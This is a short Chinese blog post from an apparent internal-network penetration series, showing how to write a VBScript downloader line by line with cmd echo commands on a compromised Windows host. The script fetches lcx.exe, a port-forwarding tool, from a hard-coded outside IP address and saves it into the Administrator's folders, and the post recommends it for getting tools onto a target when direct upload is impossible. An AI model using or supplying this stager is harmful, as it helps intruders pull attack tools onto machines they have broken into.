windows cmd下载文件

exp:

Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://45.32.62.186/lcx.exe",0                     这里需要改成你下载链接的路径
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "C:\Documents and Settings\Administrator\lcx.exe",2        这里填写下载需要放到的路径

1.新建一个空文本test.vbs,type nul>test.vbs

2.利用echo语句,一句一句的把exp写进去,>大于号是写入,>>2个大于号是换行写入,换行写入是注意大于号前面后第二个大于号后面要加空格要不然可能写不进去

echo Set xPost = CreateObject("Microsoft.XMLHTTP") > test.vbs
echo xPost.Open "GET","http://45.32.62.186/lck.exe",0 >> test.vbs
echo xPost.Send() >> test.vbs
echo Set sGet = CreateObject("ADODB.Stream") >> test.vbs
echo sGet.Mode = 3 >> test.vbs
echo sGet.Type = 1 >> test.vbs
echo sGet.Open() >> test.vbs
echo sGet.Write(xPost.responseBody) >> test.vbs
echo sGet.SaveToFile "C:\Users\Administrator\Desktop\新建文件夹\lck.exe",2 >> test.vbs

3.运行exp,直接输出test.vbs或者cmd.exe test.vbs(这里下载的时候需要有写入权限的)

提示:在渗透过程中要是发现目标机是通过内网转发出来的,没有地方可以直接上传我们的一些工具,就可以通过这个方法试试,有时候会被防火墙给gank掉,看脸了


感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!

你可能感兴趣的:(内网渗透之路)